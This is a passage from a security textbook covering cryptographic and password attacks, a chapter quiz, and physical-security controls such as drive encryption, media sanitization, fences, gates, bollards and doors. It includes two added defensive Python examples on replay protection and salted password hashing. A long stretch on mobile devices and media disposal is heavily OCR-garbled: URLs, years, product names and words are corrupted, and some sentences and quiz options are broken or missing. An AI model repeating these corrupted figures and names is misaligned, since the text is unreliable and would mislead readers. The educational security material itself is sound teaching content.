The best way to protect against attacks on encrypted messages is to take the time to select
a computationally secure encryption algorithm so that the cost of breaking the cipher acts as
a deterrent to making the effort. Keep in mind that this must be periodically reassessed because
what is computationally secure now may not be later. As an example, when DES was released
in 1977, experts estimated 90 years to brute force a key. Today, it can be done in hours. To date,
there have been no successful attacks documented against AES.

Chosen ciphertext attack — The attacker is able to decrypt a deliberately chosen
cipher text into the corresponding plaintext. Essentially, the attacker can “feed”
information into the decryption system and observe the output. The attacker may
not know the algorithm or the secret key in use. A more advanced version of this
attack is the adaptive chosen ciphertext attack (ACCA), in which the selection
of the ciphertext is changed based on results.

An attack that is successful in some situations is the replay attack, which consists of the
recording and retransmitting of packets on the network. This attack takes place when an
attacker intercepts traffic using a device such as a packet sniffer and then reuses or replays
them at a later time. Replay attacks represent a significant threat for applications that
require authentication sequences due largely to an intruder who could replay legitimate
authentication sequence messages to gain access to a system. A somewhat similar but
more advanced version of this attack is the man-in-the-middle attack (MitM), which is
carried out when the attacker gets between two users with the goal of intercepting and
modifying packets. Consider that in any situation in which attackers can insert themselves
in the communications path between two users there is the possibility that interception
and modification of information can occur.
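One way a receiver can detect and reject a replayed authentication message, as an added example that is not from the book: each message carries a nonce and a timestamp covered by an HMAC, and the receiver rejects a message whose MAC fails, whose timestamp is stale, or whose nonce it has already seen. The JSON layout, the shared key, and the 30-second freshness window are assumptions made for the example.

```python
"""Rejecting replayed authentication messages with a nonce and a timestamp
(added example, not from the book).  The message layout, the shared key and
the freshness window are assumptions made for illustration."""
import hashlib
import hmac
import json
import os
import time

SHARED_KEY = b"constructed-demo-key"   # constructed sample secret
FRESHNESS_WINDOW = 30                   # seconds a message stays acceptable


def _mac(key, fields):
    """HMAC-SHA256 over a canonical (sorted-key) JSON encoding of the fields."""
    canonical = json.dumps(fields, sort_keys=True).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def make_message(user, key=SHARED_KEY, now=None):
    """Client side: a fresh random nonce and the current time, both covered
    by the MAC, so a captured message cannot be 'refreshed' by editing it."""
    now = time.time() if now is None else now
    fields = {"user": user, "nonce": os.urandom(16).hex(), "ts": int(now)}
    return dict(fields, mac=_mac(key, fields))


class ReplayGuard:
    """Server side: remembers the nonces seen inside the freshness window."""

    def __init__(self, key=SHARED_KEY, window=FRESHNESS_WINDOW):
        self.key = key
        self.window = window
        self.seen = {}                  # nonce -> timestamp it arrived with

    def check(self, msg, now=None):
        now = time.time() if now is None else now
        fields = {k: v for k, v in msg.items() if k != "mac"}
        if not hmac.compare_digest(_mac(self.key, fields), msg.get("mac", "")):
            return "reject: bad mac"          # tampered or forged
        if abs(now - msg["ts"]) > self.window:
            return "reject: stale timestamp"  # too old, or clocks far apart
        self._forget_expired(now)
        if msg["nonce"] in self.seen:
            return "reject: replayed nonce"   # the same message, seen before
        self.seen[msg["nonce"]] = msg["ts"]
        return "accept"

    def _forget_expired(self, now):
        # Nonces older than the window can be dropped: a replay carrying one
        # of them is rejected by the timestamp check anyway, so the store
        # stays bounded without opening a replay window.
        expired = [n for n, ts in self.seen.items() if now - ts > self.window]
        for n in expired:
            del self.seen[n]


if __name__ == "__main__":
    guard = ReplayGuard()
    m = make_message("alice", now=1000)
    print(guard.check(m, now=1005))                  # accept
    print(guard.check(m, now=1010))                  # reject: replayed nonce
    print(guard.check(dict(m, ts=1100), now=1105))   # reject: bad mac
```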

Do not forget that social engineering can be effective in attacking cryptographic
systems. End users must be trained on how to protect sensitive items such as private
cryptographic keys from unauthorized disclosure. Attackers are successful if they have
obtained cryptographic keys, no matter how the task was accomplished. If they can

FYI

Countermeasures against replay attacks include Kerberos, nonces, or timestamps. Kerberos
is a single sign-on authentication system that can reduce password posting and secure the
authentication process. A nonce is a number used once. Its value is in adding randomness in
cryptographic systems and authentication protocols to ensure that old communications cannot
be reused. Timestamps are used so that recipients can verify the timeliness of the message
and recognize and/or reject replays of messages as needed.


decrypt sensitive information, it is "game over" for the defender. Social engineering
attacks can take many forms, including fooling or coercing a user to accept a self-signed
certificate, exploiting vulnerabilities in a Web browser, or taking advantage of the certificate
approval process to receive a valid certificate and apply it to the attacker's own site.

Passwords represent one of the most commonly sought after and attacked items in
IT and security. There are several methods that can be employed to attack and obtain

• Dictionary attacks
• Hybrid attacks
• Brute-force attacks
• Rainbow tables

When examining the problems with passwords and the attacks that can be used,
it is important not to forget some of the reasons why the attacks work. One of the
common problems is the simple fact that many people use ordinary words as their
password. When a user happens to choose a password that comes from the dictionary
or is a name, it is much easier for an attacker to obtain the password by using methods
such as a dictionary attack. To crack a password all an attacker has to do is obtain a piece
of software with a dictionary list, which is easily obtainable. In most cases, the dictionary
list or word files contain long lists of various words that have been predefined and can
be quickly downloaded for use. While having a dictionary file will work against weak
passwords, there is still the issue of obtaining the passwords in a format that can be
used. To provide protection, passwords are commonly stored in a hashed format instead
of in the clear. If hashing is used to store passwords, it is possible to thwart it by using
an attack technique commonly known as comparative analysis. Simply put, each possible
dictionary word is hashed and then compared with the encrypted password. Once a
until termination or a subsequent match is found.

Brute-force password-cracking programs employ a decidedly lower-tech approach to
breaking passwords by attempting every possible combination of characters in varying
lengths. Brute-force attacks will eventually be successful given enough time, but that time
might extend into the millions of years. Brute-force attacks can be very effective if many

FYI

One effective attack against authentication systems that make use of a password is a hardware
keylogger. The attacker attaches the device to the computer, waits for users to log on, and
then later retrieves the keylogger with the username and passwords. There are many versions
of malware that do this as well; users inadvertently download the code by visiting an infected
Web site.


computers are used in parallel to perform the password search, creating a large network
with the power to do so. Brute-force software has been fine-tuned over the last few years
to work more efficiently using techniques designed to decrease their search time by
looking at things such as the password minimum length, the password maximum length,
and password case sensitivity to further speed the recovery process.

A relative newcomer on the scene of password cracking is an attack that uses
a technique known as rainbow tables, in which a lookup table is used to offer a time-
memory tradeoff. In layman's terms, a rainbow table is a database of precomputed
hashes. These hashes are stored and then compared with encrypted password values
with the goal of uncovering a match. Once a value matches the plaintext, the password
is then revealed. The only downside of a rainbow table is the size of the data generated
and the time taken to initially generate the tables.
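The storage format decides whether the comparative analysis and rainbow-table approaches described above pay off, as this added example (not from the book) shows: an unsalted MD5 store is audited against one precomputed table of dictionary words, while a salted, iterated PBKDF2 store gives every user a distinct record even for identical passwords, so no table computed in advance applies and every guess costs a full derivation. The user records, the word list, and the function names are constructed for the example.

```python
"""Password storage versus precomputed-hash attacks (added example, not
from the book).  User records and the word list are constructed samples."""
import hashlib
import hmac
import os

# Constructed stand-in for a downloaded dictionary file.
WORDLIST = ["password", "letmein", "washington", "sunshine", "dragon"]


def unsalted_md5(password):
    """The weak store: one deterministic digest per password, no salt."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precomputed table: the idea behind comparative analysis and rainbow
    tables in its simplest form, hash each word once and look up many."""
    return {unsalted_md5(w): w for w in words}


def audit_unsalted_store(store, table):
    """Defender's audit of an unsalted store: which users chose a dictionary
    word?  No hashing per user is needed, which is exactly the weakness."""
    return {user: table[h] for user, h in store.items() if h in table}


def has_duplicate_values(store):
    """True if two users share an identical stored value.  An unsalted store
    reveals that two users chose the same password; a salted one does not."""
    values = list(store.values())
    return len(values) != len(set(values))


# The hardened store: a random per-user salt plus an iterated derivation, so
# each guess costs ITERATIONS hash computations and any precomputed table
# would have to be rebuilt for every salt.
ITERATIONS = 100_000


def make_record(password, salt=None):
    """Stored form: hex(salt) + '$' + hex(PBKDF2-HMAC-SHA256 digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify(password, record):
    """Re-derive with the stored salt and compare in constant time."""
    salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    weak = {"alice": unsalted_md5("washington"),
            "bob": unsalted_md5("N3ver*Guess-Me"),
            "carol": unsalted_md5("washington")}
    print(audit_unsalted_store(weak, build_lookup_table(WORDLIST)))
    print("duplicates visible:", has_duplicate_values(weak))        # True
    strong = {u: make_record("washington") for u in ("alice", "carol")}
    print("duplicates visible:", has_duplicate_values(strong))      # False
    print("verify:", verify("washington", strong["alice"]))         # True
```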

CHAPTER SUMMARY

This chapter reviewed the concepts of cryptography. Although an extremely detailed
knowledge of encryption is not necessary, an understanding of the mechanics of
cryptography is important. Symmetric encryption works well for bulk encryption,
but it does have drawbacks such as problems with key exchange and scalability.

Asymmetric encryption resolves the problems symmetric encryption has with key
exchange and scalability, but is computationally more complex, and thus takes more
processing time. Asymmetric encryption also makes use of two keys called key pairs.
In asymmetric encryption, what one key does, the second undoes. Combining symmetric
and asymmetric systems results in a very powerful solution because the best of both
systems can be used. Modern cryptographic systems such as IPSec, SSH, SSL, and
others make use of both symmetric and asymmetric encryption.

This chapter also reviewed hashing and how it is used to ensure integrity. When hashing
is implemented into the digital signature process, the user gains integrity, authenticity,
and nonrepudiation. Digital signature techniques rely on the creation of a digest or
fingerprint of the information using a cryptographic hash, which can be signed more
efficiently than the entire message.

Finally, various types of cryptographic attacks were examined, including known
plaintext attacks, ciphertext attacks, man in the middle attacks, and password attacks.
Passwords can be attacked via dictionary, hybrid, brute force, or rainbow tables.


KEY CONCEPTS AND TERMS

Asymmetric encryption
Brute-force attack
Dictionary attack

Hash

Symmetric encryption
Trapdoor functions

CHAPTER 3 ASSESSMENT

1. Which of the following is not one of the key concepts of cryptography?

A. Availability
B. Integrity
C. Authenticity
D. Privacy

2. Common symmetric encryption algorithms include all of the following except ____.

A. (illegible)
B. AES
C. IDEA
D. DES

3. A birthday attack can be used to attempt to break ____.

A. DES
B. RSA
C. PKI
D. MD5

4. The best description of zeroization is ____.

A. Used to encrypt asymmetric data
B. Used to create an MD5 hash
C. Used to clear media of a key value
D. Used to encrypt symmetric data

5. What is the primary goal of PKI?

A. Hashing
B. Third-party trust
C. Nonrepudiation
D. Availability

6. Digital signatures are not used for ____.

A. Authentication
B. Nonrepudiation
C. Integrity
D. Availability

7. Key management is potentially the biggest problem in ____.

A. Hashing
B. Asymmetric encryption
C. Symmetric encryption
D. Cryptanalysis

8. ____ is well suited for bulk encryption.

A. MD5
B. Diffie-Hellman
C. DES
D. RSA

9. ____ is not part of the key management process.

A. Generation
B. Storage
C. Distribution
D. Layering

10. Which attack requires the attacker to obtain several encrypted messages that have been encrypted using the same encryption algorithm?

A. Known plaintext attack
B. Ciphertext-only attack
C. Chosen plaintext attack
D. Random text attack

11. What is another name for a one-time pad?

A. Vernam cipher
B. DES
C. Concealment cipher
D. Caesar cipher

12. ____ is an example of a hashing algorithm.

A. MD5
B. DES
C. AES
D. Twofish

13. Which of the following is the least secure?

A. PAP
B. CHAP
C. IPSec

CHAPTER

4

Physical Security

WHEN DISCUSSING SECURITY it is easy to get caught up and immersed
in the technology and the attacks associated with it. Take care not to
forget areas such as physical security, however. The assets the security
professional is charged with protecting are not just sitting “in a field” someplace.
Each has facilities and other items surrounding it. Hackers know this fact so
they focus not only on trying to break and subvert technology. They also spend
significant time looking for weaknesses in the facilities and the physical assets
that make structures such as the network possible. If a hacker can gain physical
access to a facility, it is more than possible for that attacker to inflict damage
to the organization by accessing assets that are not properly protected. Some
security experts say that if attackers can achieve physical access to a system
it is under their control, and the battle is lost. Good physical security must be
well thought out and considered. You must carefully consider devices such as
computers, servers, notebooks, cell phones, BlackBerrys, and removable media
and put in place countermeasures to protect them.

A basic example: Companies should position computer screens so that
passersby cannot see sensitive data. They should also create a policy requiring
users to secure their systems when they leave their computer for any reason.

Chapter 4 Topics

This chapter covers the following topics and concepts:

• What basic equipment controls are
• What physical area controls are
• What facility controls consist of
• What personal safety controls are and how they work
• What physical access controls are and how they work
• How to avoid common threats to physical security
• What defense in depth is


Chapter 4 Goals

When you complete this chapter, you will be able to:

• Define the role of physical security

• Describe common physical controls

• List the purpose of fences

• Describe how bollards are used

• Explain basic types of locks

• Identify how lock picking works

• List the usage of closed -circuit TV (CCTV)

• Describe the concept of defense in depth
• Define physical intrusion detection

• List ways to secure the physical environment

• Detail building design best practices

• Describe alarm systems


Basic Equipment Controls

Basic equipment controls are defensive measures placed on the front lines of security.
These controls can be both an effective first line of defense as well as a visible deterrent
to an attacker. Equipment controls represent one layer of defensive measures and
as such coexist with technological and administrative controls.

Keep in mind that there are many different types of controls that regulate access
to equipment, each of which is used to prevent unauthorized access in some way.
Some basic equipment controls covered in this section include the following:

• Password screen savers and session controls

• Hard drive and mobile device encryption

• Fax machines and public branch exchanges (PBX)

Hard Drive and Mobile Device Encryption

When discussing basic equipment controls another important area you should consider is
the security of portable devices and hard drives, in today’s world there ts an ever-increasing
number of portable devices such as hard drives as well as laptops, tablet PCs, and similar

CHAPTER 4 Physical Security

Health Net Inc. is not the only company to report the loss of data as a result of stolen drives
or systems. In 2006 r the Department of Veterans Affairs (VA) lost the data of 26.5 million
patients as the result of a lost laptop. While there was no evidence that the information had
been accessed, the incident did result in a $20 million settlement. In 200S r the Registered Traveler program in the United States was briefly blocked from taking new applicants after a laptop containing the personal information of 33 r 000 people was lost. The laptop did resurface a week later and did not appear tampered with, but the incident triggered a review of how devices were handled within the program. types of systems. Mobile devices have made working remotely easier but at the same time the devices have introduced problems with the inevitable loss or theft oi” the device and the data it carries. Hard drives with sensitive data represent a real risk for the organization if they are lost, stolen > or misplaced. Consider a report from h ttpJI w ww r sea rchsecurity. com that cited a 2009 case in which Health Net Inc. reported the loss of patient data as the result of a delta security breach that led to the loss of data affecting 1.5 million customers. Tn this case* the breach took place when an external hard drive that contained a mixture of medical data, Social Security numbers, and other personally identifiable information was lost. The solution to such problems is the application of encryption. Encryption can be applied on the file, folder, or an entire hard disk and provide a strong level of protection. Applying encryption to an entire disk is known as full disk encryption or full volume encryption. Full drive encryption, which is a technique that can be implemented in hardware or software, encrypts all the data on a selected volume or disk as selected by the owners of the system. With the widespread availability of full disk encryption, a security professional should evaluate the viability of drive encryption for mobile devices as a solution to theft h loss, and the unauthorized access to data. Software programs such as Pretty Good Privacy (PGP), TrueCrypt, and BitLocker can be used to lock tiles and folders. 
Microsoft offers data encryption programs such as BitLocker and Encrypted File System (EFS) as part of the operating system in Windows Vista and Windows 20f)(k r ^ Drive Encryption: Yes or No? Drive encryption offers tremendous benefits and should be considered whenever mobile devices are in use. However, it is important to remember that drive encryption isn’t always the best solution or even useful in every case. As the old saying goes, “You don’t get something for nothing” because the cost of using the technology is a bit of processor power. While mobile systems are ideal candidates for full drive encryption, fixed systems that are already in secure areas may not be good candidates for full drive encryption. V PART 1 Hacker Techniques and Tools Be Afraid of Thumb Drives Are you curious about how an attacker can so easily steal data or walk out with sensitive information? It can take nothing more than a thumb drive to do so. If the attacker has ma I ware such as a keylogger, password ripper, or data stealing program loaded on the thumb drive, it could be that just inserting it into a computer couid launch a devastating attack. This technique is commonly used during security assessment. Learn more about this technique at http://www.securityfacus.eom/news/l 1397. While discussing mobile devices, don’t forget the multitude of mobile storage options. Companies used to be concerned about individuals carrying off sensitive information on floppies. In today’s world, however, things have changed due largely to the availability and storage capacities available on new devices. Today, companies have to seriously consider the problems posed by mobile storage. Observe the situation in most workplaces: it is easy to see a sea of iPods h universal serial bus (USB) thumb drives, portable hard drives, cell phones with cameras, and even CD/DVD blanks and burners. 
Each of these devices has the potential to move massive amounts of information out of an organization quickly and quietly. Think for a moment about today’s most common mobile storage device: the USE flash drive. These devices can carry upwards of 64GB of data in a package that is smaller than a pack of gum. Also consider the fact that USB flash drives Eire common in an ever- increasing number of forms, from watches to Swiss army knives to pens, making them more difficult to detect. A December 2009 report from http:ll w w w. mih to r y . com describes a recent hacking attack that occurred when a South Korean officer failed to remove a USB thumb drive when the system switched from a restricted-access intranet to the Internet. Attackers were able to access top secret information. The examples cited here, as well as countless others* illusl rate ihm even an Item as seemingly harmless as a thumb drive can become dangerous when connected to a system that is part of a network. Under the right conditions, a thumb drive can be loaded with malicious code and inserted into a computer. Because many systems have features such as auto run enabled, the applications run automatically. Just the sheer number of these portable devices [and their small size) raises the concern of network adtrnnlslralors tint! security professionals alike. Asa security professional, one of your bigger challenges is dealing with devices such as thumb drives. While the devices are a definite security risk, they are universally recognized as convenient. The security professional will be required to discuss the security versus convenience issue with management to enlighten all involved of risks inherent in the system and any possible countermeasure. Whatever the decision might be in an organization, there is a need to establish some policies to enforce manage- ment’s decision. This policy should address all types of tried Ui eonlrols, how they are used, and what devices such media can he connected to. 
CHAPTER 4 Physical Security 85 Organizations should consider the implementation, or appropriate media controls, that dictate how floppy disks h CDs, DVDs, hard drives, portable storage, paper documents, and other forms of media are handled. Controls should dictate how sensitive media will be controlled, handled, and deslirwed in an approved manner. Most important, the organi- zation will need to make a decision about what employees can bring into the company and install on a computer. Included in this discussion will be portable drives, CD burners, cameras, and other devices. Management also needs to dictate how each of these approved forms of storage can he handled. Finally, a decision on how media is to be disposed of must be determined. Media can be disposed of in many acceptable ways, each depending on the type of data it was used to store and the type of media it happens to be. Paper documents can be shredded, CDs can be destroyed, and magnetic media can be degaussed. Hard drives should be sanitized, (Sanitization is the process of clearing all identified content so no data remnants can be recovered.) When sanitization is performed, none of the original information is easily recovered. Some of the methods used for sanitization are as follows: • Drive wiping — Overwriting all information on the drive. As an example. DoD.S2(M).2tf-STD (7) specifies overwriting the drive with a special digital pattern through seven passes. Drive wiping allows the drive to be reused. • Zero ization — A proc es s u s u a I ly a ssoc i a I ed w i t h c r y pt og ra phic processes. The term was originally used with mechanical cryptographic devices. These devices would be reset to 0 to prevent anyone from recovering the key In the electronic realm, zero ization involves overwriting the data with zeros. Zeroization is defined as a standard in ANSI X9.1 A • Degaussing — Permanently destroys the contents of the hard drive or magnetic media. 
Degaussing works by means of a powerful magnet that uses its field strength to penetrate the media and reverse the polarity of the magnetic particles on the tape or hard disk platters. After media has been degaussed, it cannot be reused. The only method more secure than degaussing is physical destruction.

NOTE: In certain situations organizations have taken the step of melting down hard drives instead of wiping them. The perception here is that this process makes it impossible to recover the contents of the drive; however, when done correctly, wiping a drive is extremely effective at preventing recovery of data.

## Fax Machines and Public Branch Exchanges

While fax machines are nowhere near as popular as they were in the 1990s, they still remain an area of concern for the security professional. Digital fax machines have been in use since the 1970s and continue to be used. When fax machines were originally designed, it was not with security in mind, so information in faxes is transmitted completely unprotected. Fax transmissions can potentially be intercepted, sniffed, and decoded by the clever and astute attacker. Additionally, once at the destination, faxes typically sit in a tray waiting for the owner to retrieve them, which sometimes takes a long time. Faxes are vulnerable at this point because anyone can retrieve the fax and review its contents. Another issue is that cheap fax machines use ribbons; therefore, anyone with access to the trash can retrieve the ribbon and use it as a virtual carbon copy of the original document.

NOTE: An attacker picking up a fax meant for another individual from a tray can easily go unnoticed. Consider that the recipient of a fax often tells someone to resend instead of asking any questions about where the original fax may have gone.

When performing a security assessment for an organization, it is important to take note of any fax machines present, what they are used for, and any policies that dictate the use of such devices. Worth noting is the fact that most organizations that have fax numbers may not have a physical fax, having replaced the devices with fax servers instead, which are not as obvious to spot. These devices can send faxes as well as receive faxes and route them to a user's e-mail. While it may be argued that this is better than a fax machine, it is not enough to secure the transmission of confidential information by fax. As an additional and more robust level of security, activity logs and exception reports should be collected to monitor for potential security problems.

In today's world, more companies are reliant on a technology known as private branch exchange (PBX) for intra-office phone communication. These devices make attractive targets for an attacker, and if misconfigured have the capability to be hacked; under the right conditions, it is possible that an attacker can make anonymous and free phone calls. To secure this portion of the communication infrastructure, default passwords need to be changed, and remote maintenance must be restricted. These systems are not usually run by security professionals and may not be as secure as the network infrastructure. Individuals that target such devices are known as phreakers.

NOTE: While PBX systems are typically reserved for large companies and not just anyone can get access, it is not difficult to gain information. A quick Google search for a specific PBX system will, after some investigation, yield information on how to configure and administer a PBX system. With this information in hand, an attacker can hack into a PBX system and perform all sorts of actions that may go unnoticed.

## Voice over IP (VoIP)

A rapidly growing technology, Voice over IP (VoIP) is more than likely something you will have to address in your security planning.
VoIP allows the placing of telephone calls over computer networks and the Internet. VoIP has the ability to transmit voice signals as data packets over the network in real time and provide the same level of service as you would expect with traditional phone service. Because voice is transmitted over the network as data packets much like any other data, it is susceptible to most of the attacks that affect regular data transmission. Attacks such as packet sniffing and capture can easily capture phone calls transmitted over the network; in fact, due to the sheer volume of calls that may be placed at any one time, a single attack can intercept and affect numerous calls.

# Physical Area Controls

When looking at the overall security stance of an organization, you have numerous controls to use, each for a different reason. In the physical world, the first controls that someone wishing to cause harm is likely to encounter are those that line the perimeter of an organization. This perimeter is much like the moat or walls around a castle, designed to provide both a deterrent and a formidable obstacle in the event of an attack. When assessing an organization, pay attention to those structures and controls that extend in and around an organization's assets or facilities. Every control or structure observed should provide protection either to delay or deter an attack, with the ultimate goal of stopping unauthorized access. While it is possible that, in some cases, a determined attacker will make every effort to bypass the countermeasures in the first layer, additional layers working with and supporting the perimeter defenses should provide valuable detection and deterrent functions. During the construction of new facilities, the security professional should get involved early to give advice on what measures can be implemented.
It is more than likely, however, that the security professional will arrive on scene long after construction of facilities has been completed. In these cases, a thorough site survey should be conducted with the goal of assessing the current protection offered. If tasked with performing a site survey, do not overlook the fact that natural geographic features can and do provide protection as well as the potential to hide individuals with malicious intent from detection. When surveying an existing facility, consider items such as natural boundaries at the location and fences or walls around the site. Common physical area controls placed at the perimeter of the facility can include many types of physical barriers that will physically and psychologically deter:

• Fences
• Perimeter intrusion detection systems (PIDS)
• Gates
• Bollards
• Warning signs and notices
• Trees and foliage

## Fences

Fences are one of the physical boundaries that provide the most visible and imposing deterrent. Depending on the construction, placement, and type of fence in place, it may deter only the casual intruder or a more determined individual. As fences change in construction, height, and even color, they also can provide a psychological deterrent. For example, consider an eight-foot iron fence with thick bars painted flat black: such a barrier can definitely represent a psychological deterrent. Ideally, a fence should both limit an intruder's access to a facility and provide a psychological barrier.

## Walls in History

Almost everyone has heard about the Great Wall of China, built to keep out the Mongols. Two other examples from history of walls that served as effective barriers are the Berlin Wall and Hadrian's Wall. The Berlin Wall was put in place to stop the exodus of people from East Germany to the West. Until it was torn down in 1989, the physical and psychological deterrent of this barrier was obvious to anyone who looked upon the structure.
In its final form, the Berlin Wall was a miles-long concrete and steel barrier line that was supplemented with land mines, dogs, guards, antitank barriers, and other mechanisms designed to strike fear into people and prevent escape attempts. Of course, the Berlin Wall did not prevent the occasional escape attempt (100 to 200 people died trying to make their way into the West over the wall). Hadrian's Wall was put in place by the Roman Emperor Hadrian to stop invaders and mark the edge of his territory. Hadrian's Wall was an impressive engineering marvel, stretching across a large swath of northern Britain, designed to keep out the "barbarians" and serve as a physical manifestation of the edge of the empire. Ultimately, as the empire decayed and fell into ruin, the wall went unmanned, but not before serving its purpose for some time.

Depending on the company or organization involved, the goal of erecting a fence may vary from stopping casual intruders to providing a formidable barrier to entry. Fences work well at preventing unauthorized individuals from gaining access to specific areas, but also force individuals that have or want access to move to specific chokepoints to enter the facility. When determining the type of fence to use, it is important to get an idea of what the organization may need to satisfy the goals of the security plan. To get a better idea, review Table 4-1, which contains a sampling of fence types and the construction and design of each. Fences should be eight feet in height or greater to deter determined intruders.

Table 4-1 Fence types.

| TYPE | SECURITY | MESH | GAUGE |
| --- | --- | --- | --- |
| A | Extreme High Security | 3/8 inch | 11 gauge |
| B | Very High Security | 1 inch | 9 gauge |
| C | High Security | 1 inch | 11 gauge |
| D | Greater Security | 2 inch | 6 gauge |
| E | Normal Fencing | 2 inch | 9 gauge |

In situations where security is even more of a concern, and just the placement of a fence may not be enough, it is possible to layer other protective systems.
For example, a perimeter intrusion and detection assessment system (PIDAS) can be used. This special fencing system works as an intrusion detection system (IDS) in that it has sensors that can detect intruders. While these systems are expensive, they offer an enhanced level of protection over standard fences. In addition to cost, the downside of these systems is that they may produce false positives due to environmental factors such as a stray deer, high winds, or other natural events.

## Gates

Fences are an effective barrier, but they must work in concert with other security measures and structures. A gate is a chokepoint or a point where all traffic must enter or exit the facility. All gates are not created equal, however, and if you select the incorrect one, you won't get proper security. In fact, choosing the incorrect gate can even detract from an otherwise effective security measure. A correctly chosen gate provides an effective deterrent and a barrier that will slow down an intruder, whereas an incorrectly chosen barrier may not deter anyone but the casual intruder. UL Standard number 325 describes gate requirements. Gates are divided into the following four classifications:

• Residential or Class 1 — These are ornamental in design and offer little protection from intrusion.
• Commercial or Class 2 — These are of somewhat heavier construction and fall in the range of three to four feet in height.
• Industrial or Class 3 — These are in the range of six to seven feet in height and are of heavier construction, including chain link construction.
• Restricted Access or Class 4 — These meet or exceed a height of eight feet and are of heavier construction, such as iron bars or concrete and similar materials. Gates in this category can include enhanced protective measures including barbed wire.

## Want to Know More?

For more detailed information on site security, consider the many resources available on this topic.
One is RFC 2196, Site Security Handbook. This document provides practical guidance to administrators seeking to secure critical assets. You can read more at: http://www.faqs.org/rfcs/rfc2196.html

## Bollards

Bollards are devices that can take many forms, but the goal is the same: prevent entry into designated areas by motor vehicle traffic. To get an idea of a location where bollards would be ideal and how they function, consider an electronics superstore such as Best Buy. In this case, lots of valuable merchandise is present and someone could very easily back a truck through the front doors after hours, load up on merchandise, and drive away quickly before law enforcement arrives. In the same situation, the placement of heavy steel posts or concrete barriers would stop a motor vehicle from even reaching the doors. Many companies use bollards to prevent vehicles from going into areas in which they are not permitted. Bollards, which can be concrete or steel, block vehicular traffic or protect areas where pedestrians may be entering or leaving buildings.

Bollards may not always be as visible as a steel post or concrete barrier. In some situations the bollards are cleverly hidden using landscaping or subtle design cues. For example, some locations (for example, malls or shopping centers) will place large concrete planters with trees or some other form of plants or decorations in front of entry points vulnerable to vehicle attacks. Another example is a retailer like Target, which often uses large concrete balls painted red in front of the main doors. While most customers may think of these as decorations or a representation of the Target logo, they are actually a form of bollard. Typically, bollards are hidden to be less imposing to customers, but still serve the designated function.
While fences act as a first line of defense, bollards are a close second as they can deter individuals from ramming a facility with a motor vehicle. Bollards can come in many shapes, sizes, and types. Some are permanent, while others pop up as needed to block a speeding car from ramming a building or ram-raiding. Ram-raiding is a type of smash-and-grab burglary in which a heavy vehicle is driven through the windows or doors of a closed shop, usually one selling electronics or jewelry, to quickly rob it.

# Facility Controls

In addition to bollards, other security controls offer protection, and each has to be evaluated to ensure that security requirements are being met. These security controls, or facility controls, come in the form of doors, windows, and any other entry points into a facility. The weakest point of a structure is generally the first to be attacked. This means doors, windows, roof access, fire escapes, delivery access, and even chimneys are targets for attackers. In fact, anyone who has watched programs such as COPS or other types of reality shows based on law enforcement long enough has probably seen a handful of "dumb" criminals who got stuck trying to get into a chimney. This should serve as a reminder that you need strong facility controls and that you must provide only the minimum amount of access required and restrict unauthorized individuals from secure areas. Some of the ways to achieve these goals are by examining and assessing the following:

• Doors, mantraps, and turnstiles
• Walls, ceilings, and floors
• Windows
• Guards and dogs
• Construction

## Doors, Mantraps, and Turnstiles

Except for the majority of exterior doors, most doors are not designed or placed with security in mind.
While doors in a home environment that are not designed with security as a goal are fine, the same cannot be said for those in a business environment. Business environments should always consider solid core doors as the primary option for doors unless otherwise specified. The advantages of solid over hollow are obvious when you consider just how easily hollow core doors can be defeated. Consider that an attacker with a good pair of boots on can kick through a hollow core door quite easily. A door designed for security will be very solid and durable and have hardened hardware. While the tendency for businesses to cut costs wherever possible is a known fact, it should be discouraged when purchasing doors by selecting the type of door only after security needs have been assessed. Low-cost doors are easy to breach, kick in, smash, or compromise. A solid core door should always be used for the protection of a server room or other critical assets. Doors also need to have a fire rating assigned to them, which is another item to be considered before installing. Doors come in many configurations, including the following:

• Industrial doors
• Vehicle access doors
• Bulletproof doors
• Vault doors

Is just having a well-selected door the end of the problem? Absolutely not; you must consider the frame that the door is attached to. A good door connected to a poorly designed or constructed frame can be the Achilles heel of an otherwise good security mechanism. During a security review, it is also important to examine not only the doors in place but also the hardware used to attach the door to the frame and the frame itself. Consider the fact that something as simple as installing the hinges incorrectly to a door and frame can make them easy for a potential intruder with a screwdriver to bypass. Critical areas secured with doors should be hinged to the inside. This type of design makes it much harder for a criminal to gain access.
This means that hinges and strike plates must be secure.

NOTE: While the importance of selecting the correct door is not something to be overlooked by the security professional, also understand that proper evaluation may require the services of a specialist. Because an information security professional doesn't usually have a background in construction or carpentry, it is important to consult with a specialist who better understands the issues involved.

Some doors are hinged on the outside and are designed to open out. Exterior doors are a good example of this. While the hinges are protected, the open-out feature of the door provides an invaluable safeguard against people getting trapped in a building in the event of a fire or other emergency. These doors are more expensive because they are harder to install and remove. Common places to observe these types of doors are shopping malls and other public facilities, specifically the exit doors. In some cases, exit doors are even equipped with a panic bar that can help when large crowds rush the door and need to leave quickly.

Companies should also be concerned about the flow of traffic into the facility. This is the type of situation where a device known as a mantrap can prove helpful. A mantrap is a structure that replaces a normal single door with a phone booth-sized object with a door on each side. When an individual enters the mantrap there is only enough space for one person at a time, and only one door can be opened at a time. The structure's design allows individuals to be screened via a camera or code to ensure that every individual is supposed to be entering and (in some cases) exiting the area. While mantraps are designed to regulate the flow of traffic in and out of an area, they specifically stop piggybacking, which is the practice of one individual actually opening the door to let several enter.
Another type of physical control device in common usage is the turnstile, which is commonly used at sporting events, subways, and amusement parks. Turnstiles can be used to slow the flow of traffic into areas or even ensure that individuals are properly screened and authenticated prior to entering an area.

## Walls, Ceilings, and Floors

